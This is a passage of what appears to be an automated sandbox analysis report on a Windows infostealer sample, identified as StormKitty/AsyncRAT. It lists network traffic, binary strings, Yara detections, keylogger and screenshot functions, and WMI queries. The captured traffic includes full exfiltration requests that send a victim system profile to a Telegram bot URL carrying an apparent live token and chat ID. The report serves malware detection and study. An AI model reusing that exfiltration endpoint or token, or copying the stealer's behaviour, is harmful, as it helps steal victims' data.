20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.16.185.241 104.16.185.241

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: icanhazip.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1Host: api.mylnikov.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-08-04%208:57:31%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20715575%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20U2FFA%0ARAM:%204095MB%0AHWID:%208E348CD443%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1Host: api.telegram.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: 55.235.10.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 04 Aug 2024 12:57:43 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=2678400CF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zVqKMpksYtBbNLnOKL%2FRZrhZzNbju6VuEwKwugFrcsvtLptkwWXMvWLJUCeUK6uCLoYzfttzQLsH9P%2B0XtR7RFcSXBXlAHYHSSkbzogpQbgwx%2FKMRi1268Dpmu%2BXP9%2F0QUqp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Strict-Transport-Security: max-age=0; preloadX-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 8adeb6faced90c7a-EWRalt-svc: h3=":443"; ma=86400

Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.mylnikov.org
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.mylnikov.orgd
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.00000000030BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.00000000030BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002F09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002F09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002F09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/t
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000301A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.comd
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002F09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000301A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000301A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000301A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000301A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000301A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002F09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.00000000030BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: eEo6DAcnnx.exe	String found in binary or memory: https://api.telegram.org/bot
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000309F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000309F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.00000000030B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=57954
Source: eEo6DAcnnx.exe	String found in binary or memory: https://api.telegram.org/file/bot
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000309F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgd
Source: tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: eEo6DAcnnx.exe	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty0&
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002F09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKittyTC
Source: eEo6DAcnnx.exe	String found in binary or memory: https://pastebin.com/raw/7B75u64B
Source: eEo6DAcnnx.exe	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
Source: tmpCF7E.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org
Source: tmpCF7E.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmpCF7E.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: places.raw.0.dr, tmpCF7E.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org
Source: tmpCF7E.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org#
Source: tmpCF7E.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: tmpCF7E.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: tmpCF7E.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49720 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: eEo6DAcnnx.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR

Contains functionality to capture screen (.Net source)

Source: eEo6DAcnnx.exe, DesktopScreenshot.cs

.Net Code: Make

Contains functionality to log keystrokes (.Net Source)

Source: eEo6DAcnnx.exe, Keylogger.cs	.Net Code: SetHook
Source: eEo6DAcnnx.exe, Keylogger.cs	.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: eEo6DAcnnx.exe, type: SAMPLE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: eEo6DAcnnx.exe, type: SAMPLE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: eEo6DAcnnx.exe, type: SAMPLE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: eEo6DAcnnx.exe, type: SAMPLE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: eEo6DAcnnx.exe, type: SAMPLE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_00F66390	0_2_00F66390
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_00F65AC0	0_2_00F65AC0
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_00F65778	0_2_00F65778
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_00F69760	0_2_00F69760
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_00F69750	0_2_00F69750
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_052905F0	0_2_052905F0
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_05290600	0_2_05290600
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_0529C108	0_2_0529C108
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_0529C0F7	0_2_0529C0F7
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_05295D60	0_2_05295D60
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Code function: 0_2_05295D52	0_2_05295D52

Source: eEo6DAcnnx.exe, 00000000.00000002.4766393640.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs eEo6DAcnnx.exe
Source: eEo6DAcnnx.exe, 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs eEo6DAcnnx.exe
Source: eEo6DAcnnx.exe	Binary or memory string: OriginalFilenameClient.exe. vs eEo6DAcnnx.exe

Source: eEo6DAcnnx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: eEo6DAcnnx.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: eEo6DAcnnx.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: eEo6DAcnnx.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: eEo6DAcnnx.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: eEo6DAcnnx.exe, type: SAMPLE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: eEo6DAcnnx.exe, Settings.cs

Base64 encoded string: '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

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@17/88@4/4

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

File created: C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e

Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

File created: C:\Users\user\AppData\Local\Temp\tmpCE5B.tmp

Jump to behavior

Source: eEo6DAcnnx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: eEo6DAcnnx.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
